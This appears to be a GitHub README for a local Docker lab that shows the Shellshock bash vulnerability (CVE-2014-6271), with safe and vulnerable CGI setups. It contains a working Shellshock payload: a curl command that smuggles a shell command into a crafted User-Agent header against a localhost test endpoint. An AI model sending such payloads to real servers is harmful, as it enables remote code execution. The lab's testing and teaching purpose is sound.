Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 

README.md

CVE-2014-6271 - ShellShock

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment.

Safe setup

FILE=safe.cgi docker compose up -d

Vulnerable Setup

FILE=vuln.cgi docker compose up -d

Test the vulnerability

For both setup its sufficient to run the following to verify the presence of the vulnerability

curl -H "User-Agent: () { :;}; echo Content-Type: text/plain; echo; /usr/bin/id" http://localhost:1337/test.cgi

Affected Versions

  • <=4.3

References